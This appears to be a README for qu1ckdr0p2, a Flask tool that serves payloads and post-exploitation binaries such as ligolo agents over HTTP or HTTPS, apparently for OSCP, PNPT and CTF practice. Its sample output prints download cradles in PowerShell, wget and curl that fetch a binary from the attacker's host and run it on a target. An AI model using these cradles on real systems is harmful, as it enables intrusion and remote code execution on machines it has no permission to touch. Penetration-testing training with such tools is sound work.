Qu1Ckdr0P2 – Quicky Serve Files Over Http Or Https Using Flask
Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.
Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.
Pull requests and issues welcome. As are any contributions.
Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use when using the --https option, priority is also given to the tun0 interface when the webserver is running, otherwise it will use eth0.
The common.ini defines the mapped aliases used within the --search and -u options.
When the webserver is running there are several download cradles printed to the screen to copy and paste.
pip3 install qu1ckdr0p2
echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc
or
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc
serv init --update
$ serv serve -f implant.bin --https 443$ serv serve -f file.example --http 8080$ serv --help
Usage: serv [OPTIONS] COMMAND [ARGS]...
Welcome to qu1ckdr0p2 entry point.
Options:
--debug Enable debug mode.
--help Show this message and exit.
Commands:
init Perform updates.
serve Serve files.$ serv serve --help
Usage: serv serve [OPTIONS]
Serve files.
Options:
-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.$ serv init --help
Usage: serv init [OPTIONS]
Perform updates.
Options:
--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.$ serv init --update$ serv init --update-selfThe mapped alias numbers for the -u option are dynamic so you don't have to remember specific numbers or ever type out a tool name.
$ serv serve --search ligolo
[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1
[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2
[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3
[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
(...)$ serv serve --search ligolo -u 3 --http 80
[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit
[→] URL: http://192.168.1.5:80/agent
[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'
[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent
⠧ Web server running
MIT
